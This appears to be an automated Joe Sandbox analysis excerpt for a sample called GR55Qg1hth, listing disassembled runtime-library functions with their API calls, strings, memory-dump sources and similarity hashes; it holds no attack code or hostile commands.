Instruction Fuzzy Hash: B2115B72A0AB02D2E724CF14E9803A977B1FB94748F699135C28C973A8DF7CE495C784

Function 00007FF6502261BF Relevance: 1.3, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF650252502

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 00e646be98459c525c89ed753d74ee293176d6fc02acd177718a1669a59afb10
Instruction ID: a70f0688066395c4bfcec2c44a82a555b543d26e8809a540c87d2197419988ca
Opcode Fuzzy Hash: 00e646be98459c525c89ed753d74ee293176d6fc02acd177718a1669a59afb10
Instruction Fuzzy Hash: 4E115B72A09B02D2E7148F14E9803A936A1FB84748F699135C28CA7398DF7CE495C794

Non-executed Functions

Function 00007FF650241B90 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 26libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF650241BA1
GetProcAddress.KERNEL32 ref: 00007FF650241BB8
LoadLibraryW.KERNEL32 ref: 00007FF650241BDF
GetProcAddress.KERNEL32 ref: 00007FF650241BEF

Strings

SystemFunction036, xrefs: 00007FF650241BE5
msvcrt.dll, xrefs: 00007FF650241B9A
rand_s, xrefs: 00007FF650241BAE
advapi32.dll, xrefs: 00007FF650241BD8

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: SystemFunction036$advapi32.dll$msvcrt.dll$rand_s
API String ID: 384173800-4041758303
Opcode ID: c014e3c1f0149275a499bc7eb12d30e85ab0ea5a766f2352989478e0542848d7
Instruction ID: 81788e7c32a7cd7789d1105849ef145d1da071059a60a3d18aa63f033a4d7429
Opcode Fuzzy Hash: c014e3c1f0149275a499bc7eb12d30e85ab0ea5a766f2352989478e0542848d7
Instruction Fuzzy Hash: 29F0FF30A1AA03F2EE04DB52F89007833A0BF49754B8C0536CC4DE2720EF2CE04AC750

Function 00007FF650236CA0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 35windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF650236CAA
FormatMessageA.KERNEL32 ref: 00007FF650236CEB
IsDebuggerPresent.KERNEL32 ref: 00007FF650236CF5

Strings

aaaaaaaaaaaaaaaaaaAAAAAAAAAAAaAAaaAaAaaaaaAaaaAAAAAAAaAaaaaaaaaa, xrefs: 00007FF650236CA2

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID: DebuggerErrorFormatLastMessagePresent
String ID: aaaaaaaaaaaaaaaaaaAAAAAAAAAAAaAAaaAaAaaaaaAaaaAAAAAAAaAaaaaaaaaa
API String ID: 2392558662-3677204743
Opcode ID: be2adff4325a9ba8b389cc48a9f255d462b001eddb820bc02b9914a7b4603ae5
Instruction ID: e3e41b7c9507bc80c02d6a50a99a2344ca6a26824002e8b3b3d5750e827f2d20
Opcode Fuzzy Hash: be2adff4325a9ba8b389cc48a9f255d462b001eddb820bc02b9914a7b4603ae5
Instruction Fuzzy Hash: 97016D31B2CA03A1E6908B25B8483792664FF88B84F4C9435DE8DE2764EF3CD044CB50

Function 00007FF650222790 Relevance: 9.1, APIs: 7, Instructions: 394COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fea090ce818f0d9776ffb852996240fddca4b87a8f0fa3a13f7abd970654801a
Instruction ID: 251f1bfe935119c819cb421e463caa53f1ee986e0247895d1fa6a7a4f0677339
Opcode Fuzzy Hash: fea090ce818f0d9776ffb852996240fddca4b87a8f0fa3a13f7abd970654801a
Instruction Fuzzy Hash: F812E53291C7C3A1E7118B69E9057A96BA0FF95794F488231EE8CA3796EF7DD044C700

Function 00007FF650247EB0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 73stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF650247F59

Part of subcall function 00007FF650248330: memcpy.MSVCRT ref: 00007FF6502483AB

memset.MSVCRT ref: 00007FF650247F09

Strings

basic_string::_M_replace_aux, xrefs: 00007FF650247F30

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID: memcpymemsetstrlen
String ID: basic_string::_M_replace_aux
API String ID: 160209724-2536181960
Opcode ID: cd175613186f1afa88b687f92d444d844def170a5b7d7d54e9ba5aa8aa7679e5
Instruction ID: 12eab0b15ebde2278b7ac867c8fee8604a82259e8ee5f4cdc83ed128396ddcb4
Opcode Fuzzy Hash: cd175613186f1afa88b687f92d444d844def170a5b7d7d54e9ba5aa8aa7679e5
Instruction Fuzzy Hash: C6113633F591A670E816AB6B7E014E956102B9AFF4E9C4231EE5C6BB85DC3CD583C300

Function 00007FF65024BDB0 Relevance: 2.5, Strings: 2, Instructions: 33COMMON

Download Yara Rule

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF65024BDF0
basic_string::assign, xrefs: 00007FF65024BDE9

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID: memcpy
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::assign
API String ID: 3510742995-2669816585
Opcode ID: 3622ddfe3dd2ce5dcf7d1f97ab951fcf58ce9926efb4232fe499f17666db3358
Instruction ID: c2de466430d557961aa92eb385fa3c63a25216fb607df7048b0f9892f5742c8a
Opcode Fuzzy Hash: 3622ddfe3dd2ce5dcf7d1f97ab951fcf58ce9926efb4232fe499f17666db3358
Instruction Fuzzy Hash: 3BF062B6E05A86A1E610AF61D8010A8A761F759F88F884122DA4C63325DE3CD556C704

Function 00007FF65024EF70 Relevance: 2.5, Strings: 2, Instructions: 33COMMON

Download Yara Rule

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF65024EFB0
basic_string::assign, xrefs: 00007FF65024EFA9

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID: memcpy
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::assign
API String ID: 3510742995-2669816585
Opcode ID: c1754d6dee14f81dc3763cd0d6fd8a9b6bad5cabb0c735fe84781a88c55a56ee
Instruction ID: 94fe2052028b1f105e1a0f70f6633c9ba910e78936725c9328329e79aea6ae16
Opcode Fuzzy Hash: c1754d6dee14f81dc3763cd0d6fd8a9b6bad5cabb0c735fe84781a88c55a56ee
Instruction Fuzzy Hash: 4CF09076F04B86A1E600AF65D8414A8A720F799F84FCD4532EE8C63325DF3CD596C704

Function 00007FF6502452E0 Relevance: 2.5, Strings: 2, Instructions: 32COMMON

Download Yara Rule

Strings

basic_string::substr, xrefs: 00007FF650245329
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF650245330

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::substr
API String ID: 0-3532027576
Opcode ID: 65f2cf0798e95a115fec83cb8f205f6db6aeb3e378b199a61e3594a55d741aee
Instruction ID: 4f4f88e9474598509b4b1636ecbaf323ae2b10554648511c5cb96193ccc8565e
Opcode Fuzzy Hash: 65f2cf0798e95a115fec83cb8f205f6db6aeb3e378b199a61e3594a55d741aee
Instruction Fuzzy Hash: 69F0E262B04B4BA1EE00DFAAE0904B96320FB65BC4B982432DA0DA7310EE7CE185C344

Function 00007FF650252150 Relevance: 1.3, Strings: 1, Instructions: 69COMMON

Download Yara Rule

Strings

basic_string::_M_create, xrefs: 00007FF650252152

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID: strlen$CaptureContextUnwindabortmalloc
String ID: basic_string::_M_create
API String ID: 214865124-3122258987
Opcode ID: 51bbe19fb507b71583be21cb408ad92cfffb69ad199a4023d00682e8b30e8fe1
Instruction ID: 2f6e487a65ea8edc7137a6b28cd6bb568a5f9dfcaf605b365766b515cc1df11c
Opcode Fuzzy Hash: 51bbe19fb507b71583be21cb408ad92cfffb69ad199a4023d00682e8b30e8fe1
Instruction Fuzzy Hash: D011E238F1915775E948BB636A151B65A517F4ABC9FC82431EC0DBF386DE2CE405C344

Function 00007FF65022F600 Relevance: 29.9, APIs: 11, Strings: 6, Instructions: 157synchronizationCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00007FF65022F608
CreateMutexA.KERNEL32 ref: 00007FF65022F717
WaitForSingleObject.KERNEL32 ref: 00007FF65022F728
FindAtomA.KERNEL32 ref: 00007FF65022F73D
AddAtomA.KERNEL32 ref: 00007FF65022F77D
_onexit.MSVCRT ref: 00007FF65022F79A
ReleaseMutex.KERNEL32 ref: 00007FF65022F7A2
CloseHandle.KERNEL32 ref: 00007FF65022F7AB

Strings

__eh_shmem3_gcc_tdm_, xrefs: 00007FF65022F657, 00007FF65022F687
aaaaaaaa, xrefs: 00007FF65022F6BE
failed to add string to atom table, xrefs: 00007FF65022F863
failed to get string from atom, xrefs: 00007FF65022F896
aaaaaaaa, xrefs: 00007FF65022F6B4
failed to to lock creation mutex, xrefs: 00007FF65022F876

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID: AtomMutex$CloseCreateCurrentFindHandleObjectProcessReleaseSingleWait_onexit
String ID: __eh_shmem3_gcc_tdm_$aaaaaaaa$aaaaaaaa$failed to add string to atom table$failed to get string from atom$failed to to lock creation mutex
API String ID: 2382646235-4003979217
Opcode ID: f807e9babaa5b9abb750dffb260fd96268fd1505febb0810cb3e6be92dfee7e8
Instruction ID: ab669b779200ef647cb6b106fd78d86a4578d6ecb2025a32419f46ef2a11bc1e
Opcode Fuzzy Hash: f807e9babaa5b9abb750dffb260fd96268fd1505febb0810cb3e6be92dfee7e8
Instruction Fuzzy Hash: 82618BB5E2DA43F1EA918B64AD062B56B90BF44B45F8C8436C94DE63A1EE7CE546C300

Function 000001B630F66910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000001B630F66938
__scrt_acquire_startup_lock.LIBCMT ref: 000001B630F6698A
_RTC_Initialize.LIBCMT ref: 000001B630F669B8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000001B630F669DE
__scrt_release_startup_lock.LIBCMT ref: 000001B630F66A09

Strings

`eh vector vbase copy constructor iterator', xrefs: 000001B630F669EE
scriptor', xrefs: 000001B630F66B39, 000001B630F66BB2, 000001B630F66BEC
`dynamic initializer for ', xrefs: 000001B630F669C7
`eh vector copy constructor iterator', xrefs: 000001B630F66A3B

Memory Dump Source

Source File: 00000002.00000002.1972631076.000001B630F60000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001B630F60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b630f60000_GR55Qg1hth.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
API String ID: 190073905-1786718095
Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
Instruction ID: ca828e8494340f6ea70ebf2d121fcee27b6c141f1ad6c6af70a679c6c32c09e8
Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
Instruction Fuzzy Hash: B181AD3160064986FA94AB669441FD972E0FBBDB80F54812DDE4D977B6DB3FC84E8700

Function 00007FF65022FA00 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 129COMMON

Download Yara Rule

APIs

RaiseException.KERNEL32 ref: 00007FF65022FAD3
abort.MSVCRT(?,?,?,?,?,?,00000000,00000001,?,?,00000060,?,00007FF650251F75), ref: 00007FF65022FAD9
RtlUnwindEx.KERNEL32 ref: 00007FF65022FBEC

Strings

CCG!, xrefs: 00007FF65022FA29
CCG , xrefs: 00007FF65022FA6D
CCG!, xrefs: 00007FF65022FAC1
CCG", xrefs: 00007FF65022FA61

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID: ExceptionRaiseUnwindabort
String ID: CCG $CCG!$CCG!$CCG"
API String ID: 4140830120-3707373406
Opcode ID: d0cfdab6c2a0f7617832eba8986ab3c4ae392a9887aae9ab604b1f15f9430dbd
Instruction ID: 6db4d34277860d5c26134fe6bfeadd61e3b0b930ae69a18609427d24801d8106
Opcode Fuzzy Hash: d0cfdab6c2a0f7617832eba8986ab3c4ae392a9887aae9ab604b1f15f9430dbd
Instruction Fuzzy Hash: C151A232618B8296D7A08F95F8806AD37B4F789B98F584136EE8D93B58CF3CD491C740

Function 00007FF65022F510 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 60synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32 ref: 00007FF65022F521
WaitForSingleObject.KERNEL32 ref: 00007FF65022F532
FindAtomA.KERNEL32 ref: 00007FF65022F59F
ReleaseMutex.KERNEL32 ref: 00007FF65022F5AD
CloseHandle.KERNEL32 ref: 00007FF65022F5B6
CloseHandle.KERNEL32 ref: 00007FF65022F5D7

Strings

failed to to lock cleanup mutex, xrefs: 00007FF65022F5C8

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID: CloseHandleMutex$AtomCreateFindObjectReleaseSingleWait
String ID: failed to to lock cleanup mutex
API String ID: 3776795807-674698732
Opcode ID: 193533d3492dd4cf379fe319df80661a25a0da63e728bf4553261685fad11ce2
Instruction ID: f27342fd61bcb3fb394f4fd2324821b8b61e6443e9f21d04b3caab7983ea8321
Opcode Fuzzy Hash: 193533d3492dd4cf379fe319df80661a25a0da63e728bf4553261685fad11ce2
Instruction Fuzzy Hash: F8213061A2DA43E1EE949F91DD561742790BF44F85F8C9835D90EE73A0EE3CE465C340

Function 00007FF65024DCA0 Relevance: 13.7, APIs: 8, Strings: 1, Instructions: 196COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF65024DD46
memcpy.MSVCRT ref: 00007FF65024DD71
memcpy.MSVCRT ref: 00007FF65024DDE0
memcpy.MSVCRT ref: 00007FF65024DE1E
memcpy.MSVCRT ref: 00007FF65024DE6F

Strings

basic_string::_M_replace, xrefs: 00007FF65024DF8E

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
